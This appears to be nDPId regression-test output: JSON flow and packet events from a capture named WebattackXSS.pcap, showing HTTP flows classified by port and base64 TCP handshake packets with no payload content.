-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347110266,"flow_last_seen":1499347110266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347110266,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1499347110266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347110266,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u39AAD4GClGsEAABwKgKMtHWAFDeH8hWAAAAAKACchByBAAAAgQFtAQCCAoBOXMpAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1499347110266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347110266,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0dbJG1vv3h\/IV6AScSAFVQAAAgQFtAQCCAoD40SgATlzKQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1212,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":3,"flow_last_seen":1499347110267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347110267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u4BAAD4GClisEAABwKgKMtHWAFDeH8hXyRtb8IAQAOWkXAAAAQEICgE5cykD40Sg"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347111565,"flow_last_seen":1499347111565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347111565,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1499347111565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347111565,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ioRAAD4GO0ysEAABwKgKMtHkAFDzev7qAAAAAKACchAkwgAAAgQFtAQCCAoBOXRuAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1499347111565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347111565,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0eR9BdLY83r+66AScSCL+wAAAgQFtAQCCAoD40XkATl0bgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1499347111565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347111565,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ioVAAD4GO1OsEAABwKgKMtHkAFDzev7rfQXS2YAQAOUrAwAAAQEICgE5dG4D40Xk"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347114111,"flow_last_seen":1499347114111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347114111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1499347114111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347114111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8emxAAD4GS2SsEAABwKgKMtH+AFCQhwyGAAAAAKACchB3hAAAAgQFtAQCCAoBOXbqAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1499347114111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347114111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0f6FLaNRkIcMh6AScSADoAAAAgQFtAQCCAoD40hhATl26gEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1499347114112,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347114112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0em1AAD4GS2usEAABwKgKMtH+AFCQhwyHhS2jUoAQAOWipgAAAQEICgE5dusD40hh"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347115408,"flow_last_seen":1499347115408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347115408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1499347115408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347115408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8N6NAAD4Gji2sEAABwKgKMtIMAFCkuE+MAAAAAKACchAe+gAAAgQFtAQCCAoBOXgvAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1499347115408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347115408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0gwQkJx6pLhPjaAScSAlRgAAAgQFtAQCCAoD40mlATl4LwEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1499347115409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347115409,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0N6RAAD4GjjSsEAABwKgKMtIMAFCkuE+NEJCce4AQAOXETQAAAQEICgE5eC8D40ml"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347116705,"flow_last_seen":1499347116705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347116705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1499347116705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347116705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FEVAAD4GsYusEAABwKgKMtIaAFCixG02AAAAAKACchAB8gAAAgQFtAQCCAoBOXlzAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1499347116705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347116705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0hqTGb4kosRtN6AScSBixgAAAgQFtAQCCAoD40rpATl5cwEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1499347116706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347116706,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FEZAAD4GsZKsEAABwKgKMtIaAFCixG03kxm+JYAQAOUBzgAAAQEICgE5eXMD40rp"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347119336,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119336,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347119336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AVBAAD4GxICsEAABwKgKMtI0AFAiVX1VAAAAAKACchBvlgAAAgQFtAQCCAoBOXwFAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347119336,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0jRzeBsiIlV9VqAScSCQfAAAAgQFtAQCCAoD4017ATl8BQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347119336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AVFAAD4GxIesEAABwKgKMtI0AFAiVX1Wc3gbI4AQAOUvhAAAAQEICgE5fAUD4017"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1294,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347120603,"flow_last_seen":1499347120603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347120603,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1499347120603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347120603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA815JAAD4G7j2sEAABwKgKMtJCAFDFAarTAAAAAKACchCeIQAAAgQFtAQCCAoBOX1BAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1499347120603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347120603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0kIa0KsLxQGq1KAScSCGiQAAAgQFtAQCCAoD4064ATl9QQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1499347120603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347120603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA015NAAD4G7kSsEAABwKgKMtJCAFDFAarUGtCrDIAQAOUlkQAAAQEICgE5fUED4064"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347123174,"flow_last_seen":1499347123174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347123174,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1499347123174,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347123174,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j6NAAD4GNi2sEAABwKgKMtJcAFBy9vBnAAAAAKACchCn+wAAAgQFtAQCCAoBOX\/EAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1499347123174,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347123174,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0lx1HkCocvbwaKAScSCd9QAAAgQFtAQCCAoD41E7ATl\/xAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1499347123175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347123175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j6RAAD4GNjSsEAABwKgKMtJcAFBy9vBodR5AqYAQAOU8\/QAAAQEICgE5f8QD41E7"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347124454,"flow_last_seen":1499347124454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347124454,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 